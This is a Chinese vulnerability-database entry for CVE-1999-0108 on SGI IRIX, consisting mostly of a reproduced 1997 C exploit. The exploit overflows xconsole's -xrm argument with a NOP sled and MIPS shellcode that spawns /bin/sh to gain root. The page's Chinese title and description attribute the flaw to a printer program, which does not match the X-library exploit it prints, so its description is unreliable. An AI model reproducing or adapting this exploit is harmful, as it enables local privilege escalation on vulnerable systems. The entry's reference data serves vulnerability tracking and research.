IRIX打印机程序权限许可和访问控制漏洞

IRIX打印机程序权限许可和访问控制漏洞

漏洞ID 1105307 漏洞类型 缓冲区溢出
发布时间 1997-05-27 更新时间 2005-05-02
图片[1]-IRIX打印机程序权限许可和访问控制漏洞-安全小百科CVE编号 CVE-1999-0108
图片[2]-IRIX打印机程序权限许可和访问控制漏洞-安全小百科CNNVD-ID CNNVD-199805-002
漏洞平台 IRIX CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19267
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199805-002
|漏洞详情
运行在IRIX上的打印机程序存在权限许可和访问控制漏洞。本地用户可以借助此漏洞访问根目录。
|漏洞EXP
source: http://www.securityfocus.com/bid/334/info

A vulnerability exists in the X libraries as supplied with Silicon Graphics IRIX operating system. By placing a carefully constructed buffer as the argument to the -xrm option, an attacker can execute arbitrary code. 

/* Exploit by David Hedley <[email protected]>
 * 27/5/97
 *
 * _very_ slighty modified by Patrick J..Paulus <[email protected]>
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define NUM_ADDRESSES 500
#define BUF_LENGTH 500
#define EXTRA 9000
#define OFFSET  0x180    /* 0x184 for Irix 6.x */
#define GP_OFFSET       -0x80
#define IRIX_NOP        0x03e0f825 /* move $ra,$ra */
#define PATH_PROG        "/usr/bin/X11/xconsole" /* path & program name */
#define PROG            "xconsole" /* program */

#define u_long unsigned

u_long get_sp_code[] = {
    0x03a01025, /* move $v0,$sp */
    0x03e00008, /* jr $ra */
    0x00000000, /* nop */ };

u_long irix_shellcode[] = {
    0x24041234, /* li $4,0x1234 */
    0x2084edcc, /* sub $4,0x1234 */
    0x0491fffe, /* bgezal $4,pc-4 */
    0x03bd302a, /* sgt $6,$sp,$sp */
    0x03bd202a, /* sgt $4,$sp,$sp */
    0x240203ff, /* li $v0,1023 */
    0x03ffffcc, /* syscall 0xfffff */
    0x23e40138, /* addi $4,$31,264+48 */
    0xa086feff, /* sb $6,-264+7($4)  */
    0x2084fef8, /* sub $4,264 */
    0x20850110, /* addi $5,$4,264+8 */
    0xaca4fef8, /* sw $4,-264($5)  */
    0xaca6fefc, /* sw $4,-260($5)  */
    0x20a5fef8, /* sub $5, 264 */
    0x240203f3, /* li $v0,1011 */
    0x03ffffcc, /* syscall 0xfffff */
    0x2f62696e, /* "/bin"  */
    0x2f7368ff, /* "/sh"  */ };

char buf[NUM_ADDRESSES+BUF_LENGTH + EXTRA + 8];

void main(int argc, char **argv)  {
    char *env[] = {NULL};
    u_long targ_addr, stack, tmp;
    u_long *long_p;
    int i, code_length = strlen((char *)irix_shellcode)+1;
    u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code;

    stack = get_sp();

    if (stack & 0x80000000) {
        printf("Recompile with the '-32' optionn");
        exit(1);
    }

    long_p =(u_long *)  buf;
    targ_addr = stack + OFFSET;

    if (argc > 1)
        targ_addr += atoi(argv[1]);


    tmp = (targ_addr + NUM_ADDRESSES + (BUF_LENGTH-code_length)/2) & ~3;

    while ((tmp & 0xff000000) == 0 ||
           (tmp & 0x00ff0000) == 0 ||
           (tmp & 0x0000ff00) == 0 ||
           (tmp & 0x000000ff) == 0)
        tmp += 4;

    for (i = 0; i < NUM_ADDRESSES/(4*sizeof(u_long)); i++) {
        *long_p++ = tmp;
        *long_p++ = tmp;
        *long_p++ = targ_addr;
        *long_p++ = targ_addr;
    }

    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
        *long_p++ = IRIX_NOP;

    for (i = 0; i < code_length/sizeof(u_long); i++)
        *long_p++ = irix_shellcode[i];

    tmp = (targ_addr + GP_OFFSET + NUM_ADDRESSES/2) & ~3;

    for (i = 0; i < EXTRA / sizeof(u_long); i++)
        *long_p++ = (tmp >> 8) | (tmp << 24);

    *long_p = 0;

    printf("stack = 0x%x, targ_addr = 0x%xn", stack, targ_addr);

    execle(PATH_PROG, PROG, "-xrm", &buf[2], 0, env);
    perror("execl failed");
}
|参考资料
VulnerablesoftwareandversionsConfiguration1OR*cpe:/o:sgi:irix*DenotesVulnerableSoftware*ChangesrelatedtovulnerabilityconfigurationsTechnicalDetailsVulnerabilityType(ViewAll)CVEStandardVulnerabilityEntry:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0108

相关推荐: Multiple Microsoft Internet Explorer Vulnerabilities

Multiple Microsoft Internet Explorer Vulnerabilities 漏洞ID 1101634 漏洞类型 Unknown 发布时间 2002-08-22 更新时间 2002-08-22 CVE编号 N/A CNNVD-ID …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享